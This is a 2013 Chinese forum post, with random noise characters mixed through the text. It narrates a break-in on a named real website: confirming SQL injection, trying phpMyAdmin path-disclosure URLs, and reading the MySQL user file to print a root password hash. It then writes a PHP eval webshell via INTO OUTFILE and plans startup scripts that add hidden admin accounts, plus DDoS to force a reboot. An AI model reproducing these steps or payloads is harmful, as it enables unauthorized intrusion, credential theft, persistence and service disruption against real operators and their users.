第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏$ Q, T1 M! |+ _! l' i8 S
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
' N8 \8 L- b* a3 n. C% w5 B, w: J) u k! I- G3 T
1 m" L1 ` `+ c
' U- ?; d) \5 H+ e常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 : o9 l3 D: F- Q! M5 v6 d
- q! z3 B( \6 K2 \
那么想可以直接写入shell ,getshell有几个条件:0 m, `: T8 E% _+ R$ z. @/ q
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF 1 u" y+ f/ X# I3 }
3 A8 z1 p" j% l% ?6 o8 S
试着爆绝对路径: 4 l O6 e4 f2 m4 \
1./phpMyAdmin/index.php?lang[]=1 " `1 p0 {5 C' ?- g) C5 y7 O
2./phpMyAdmin/phpinfo.php : \2 D+ N$ c6 }% ]4 _
3./load_file() + `$ _" Y( J4 T* h3 i: V: T
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
6 Z- u! ~ O, b3 K( q5 b5./phpmyadmin/libraries/select_lang.lib.php 3 p" m* b, w, Z0 N9 H
6./phpmyadmin/libraries/lect_lang.lib.php / [$ m9 E' v0 q3 Q
7./phpmyadmin/libraries/mcrypt.lib.php 7 u8 S% T' I0 w+ W- W
8./phpmyadmin/libraries/export/xls.php
6 X5 r: i* r1 t# N# y; f# ^
9 T& w$ z' ]& X( o3 X- ~- u均不行...........................
7 X' j& C# t% ]' E2 [& X0 v. Q
- n6 H$ o5 S* v: n2 Q御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
& i H0 a; U# I0 ?4 v9 v/ e8 S" f& `: r( d" Y
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin ! Z) n o6 s9 x# Z- h' L/ i" [
, M: Z* M5 T- r; x, p+ f+ D \默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
1 V: n e; l1 o$ H& k1 S4 x
$ j7 c2 p& z' v/ X5 V0 _敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... 2 A( @/ k( ]2 m9 O
! ?) ]. F* S' i8 U; D想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 4 c0 {5 i4 ?0 q9 [; q" y
* n5 J/ i5 E0 T5 B9 k. ^/ F
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini j' e. s# A% T+ g6 d# ^
7 f& ]) A2 r* P/ _( P7 N1 h+ S! \
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 4 r! L- S/ |8 D! ~2 L
T( b/ `6 p. `1 s& F6 k, ~4 _成功读到root密码: * U8 x! {; W8 m) i1 v& a
/ A, C5 Y& X1 A& X0 R- _0 @* n
17---- r(0072) 1 p' e) Z2 H* p. U. y4 `% U: O% S# A
18---- o(006f) ! n8 r+ W! L/ W
19---- o(006f) $ t! z7 w$ }7 `$ [
20---- t(0074)
- F5 ~; z) \7 i8 ~+ R* V7 `, q21---- *(002a) {5 V4 D3 O, F4 c: R
22---- 8(0038)
+ m' Y: j4 J4 u" w9 k7 u6 @& x5 q$ [23---- 2(0032) & C5 o; d' A* {; y$ j( P! [
24---- E(0045) + [# Z* v) h0 z" `# y& b
25---- 1(0031)
9 C; [) N9 Y2 Z) a, N0 ]26---- C(0043) . d& K9 n% ~6 [/ }, P4 P4 [
27---- 5(0035)
9 t* V4 k2 z9 k# a/ A" U' ?# L& ?28---- 8(0038) 5 R, \7 y, k; W; h- ] e. C" z
29---- 2(0032)
- C8 d1 {6 y; n% `0 U30---- 8(0038) * K2 {/ \) F2 T- y
31---- A(0041)
/ u$ C0 U$ c! T32---- 9(0039)
`7 W& @$ f$ S8 @+ P1 e, q, Y( d33---- B(0042)
" R2 B2 H8 B5 Q& y5 N7 w) ~34---- 5(0035) # b+ \5 l+ G( E5 M
35---- 4(0034) 8 o# a" W; u& `
36---- 8(0038)
, g3 J3 G, x$ F# I' r37---- 6(0036) . Z9 h/ t: F2 z7 `* j. J4 n0 a9 n4 W4 T
38---- 4(0034)
5 Y; T, V* p3 E, K. x39---- 9(0039) 0 a2 ~; t2 e6 d& L7 v) {
40---- 1(0031)
4 e0 L6 a; [3 y1 i' {41---- 1(0031)
" A2 r( N E. v4 x/ K1 A6 a; j; W42---- 5(0035) 4 ?6 S. f( f: Q3 j. p; ~
43---- 3(0033) 8 g! w4 D' g( b+ ~ V
44---- 5(0035) & c0 ~% Y2 r9 H, B
45---- 9(0039) 8 {4 A* m4 I1 Q% X
46---- 8(0038)
/ w" Y2 ? p3 O+ M. {7 n47---- F(0046)
T5 P% W! i& \( N8 ^48---- F(0046)
. o5 u" s6 z4 z v# ?$ R( N( i49---- 4(0034)
/ X `$ y$ H7 g N) n50---- F(0046)
3 C; Q) H' i9 u4 A# Q1 D5 d51---- 0(0030)
( K+ j9 M4 u T* Y( K! E$ \4 v5 J) D$ p52---- 3(0033)
- _' w% C# K3 j) P0 H( V53---- 2(0032) 0 s: j7 s s$ h5 `* j2 O' `9 J) N
54---- A(0041)
, _9 R0 c, d& z: P9 @55---- 4(0034)
8 n+ U# g- g# q3 w$ ?56---- A(0041) " S! o$ Z8 l6 A9 A. Q/ W4 t
57---- B(0042)
4 Z' `! q) D9 v: Z( o( B58---- *(0044) % ~% I( y( D) o+ `& a
59---- *(0035) * f O8 d$ \3 t; r- O. ^0 c2 r: E9 t6 \
60---- *(0041)
9 O6 X- G8 o# E; C% E61---- *0032) 8 Y/ ?; k$ P9 v }5 |5 h
! l1 F& ?+ f/ c, F8 I( V解密后成功登陆phpmyamin
( a; d* Q& Q5 k) e/ @4 }$ S2 c % M6 J& O- x' S
4 i7 X- f& m1 y" U0 \% h1 o
. q. S% e: @) ]5 e9 q+ G9 d
" V2 d* G* U5 z: H x找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
# k; u* Y0 ^" S4 e3 |$ ^
* R* o6 ~0 w) |& ~5 P' F成功执行,拿下shell,菜刀连接:
7 r4 ` u9 J4 z, O: s$ B& {. q, w
2 ?( q& F0 e7 ?; q服务器不支持asp,aspx,php提权无果...................
, k. s2 Z( N; R# a- Y4 P$ }; F1 y" j2 J+ t- @: U( t7 B
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
. X; U5 D2 R' d q: C6 h" Z服务器上已经有个隐藏帐号了
# s, H# A- ]& J别名 administrators% A4 a! y) Z' R" z' ]/ L% p
注释 管理员对计算机/域有不受限制的完全访问权
6 `6 G# M4 d0 Y( ^$ Z# d) ?3 S成员 6 [$ D; \: \7 |2 E. ]( n7 K
-------------------------------------------------------------------------------
$ ^: X/ t# k$ U. l4 I. Eadmin
! ^% {: l# I0 ~6 [Administrator
$ v9 _9 \; s! P: |! @slipper$
: P! C& j/ B) Asqluser
5 O3 l9 u5 D4 Z( n2 w. q命令成功完成。
# K3 n! u l' {2 ? @! O% I9 l/ [9 s5 b2 I) o
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。7 _- A0 j7 A! \0 Y5 d0 E, r6 f" e
* [' ~3 O% }. S0 j7 P C( cddos服务器重启,不然就只能坐等服务器重启了...............................
* I4 ?' y$ p' m) E3 u9 `
8 ~+ u% \! v+ {
4 J. P" z$ N% f1 M | 
发表于 2013-1-11 21:32:15
收藏
分享
支持
反对
发表于 2013-5-20 15:28:12
